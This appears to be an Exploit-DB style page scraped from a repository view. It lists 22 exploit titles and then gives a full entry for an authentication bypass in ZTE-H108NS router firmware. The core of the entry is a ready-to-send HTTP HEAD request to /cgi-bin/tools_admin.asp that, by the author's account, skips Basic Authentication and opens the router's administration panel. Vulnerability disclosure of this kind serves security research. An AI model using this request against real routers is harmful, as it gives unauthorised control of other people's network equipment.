
22 changes to exploits/shellcodes/ghdb LISTSERV 17 - Insecure Direct Object Reference (IDOR) LISTSERV 17 - Reflected Cross Site Scripting (XSS) Router ZTE-H108NS - Stack Buffer Overflow (DoS) Router ZTE-H108NS - Authentication Bypass Boa Web Server v0.94.14 - Authentication Bypass Covenant v0.5 - Remote Code Execution (RCE) Dreamer CMS v4.0.0 - SQL Injection Shoplazza 1.1 - Stored Cross-Site Scripting (XSS) Virtual Reception v1.0 - Web Server Directory Traversal 4images 1.9 - Remote Command Execution (RCE) ClicShopping v3.402 - Cross-Site Scripting (XSS) Concrete5 CME v9.1.3 - Xpath injection Device Manager Express 7.8.20002.47752 - Remote Code Execution (RCE) Ecommerse v1.0 - Cross-Site Scripting (XSS) Eve-ng 5.0.1-13 - Stored Cross-Site Scripting (XSS) myBB forums 1.8.26 - Stored Cross-Site Scripting (XSS) WPForms 1.7.8 - Cross-Site Scripting (XSS) CrowdStrike Falcon AGENT 6.44.15806 - Uninstall without Installation Token Lavasoft web companion 4.1.0.409 - 'DCIservice' Unquoted Service Path Zillya Total Security 3.0.2367.0 - Local Privilege Escalation
35 lines
No EOL
1.1 KiB
Text
35 lines
No EOL
1.1 KiB
Text
# Exploit Title: Router ZTE-H108NS - Authentication Bypass
|
|
# Date: 19-11-2022
|
|
# Exploit Author: George Tsimpidas
|
|
# Vendor: https://www.zte.com.cn/global/
|
|
# Firmware: H108NSV1.0.7u_ZRD_GR2_A68
|
|
# CVE: N/A
|
|
# Tested on: Debian 5.18.5
|
|
|
|
Description :
|
|
|
|
When specific http methods are listed within a security constraint,
|
|
then only those
|
|
methods are protected. Router ZTE-H108NS defines the following http
|
|
methods: GET, POST, and HEAD. HEAD method seems to fall under a flawed
|
|
operation which allows the HEAD to be implemented correctly with every
|
|
Response Status Code.
|
|
|
|
|
|
Proof Of Concept :
|
|
|
|
Below request bypasses successfully the Basic Authentication, and
|
|
grants access to the Administration Panel of the Router.
|
|
|
|
|
|
HEAD /cgi-bin/tools_admin.asp HTTP/1.1
|
|
Host: 192.168.1.1
|
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
DNT: 1
|
|
Connection: close
|
|
Cookie: SESSIONID=1cd6bb77
|
|
Upgrade-Insecure-Requests: 1
|
|
Cache-Control: max-age=0 |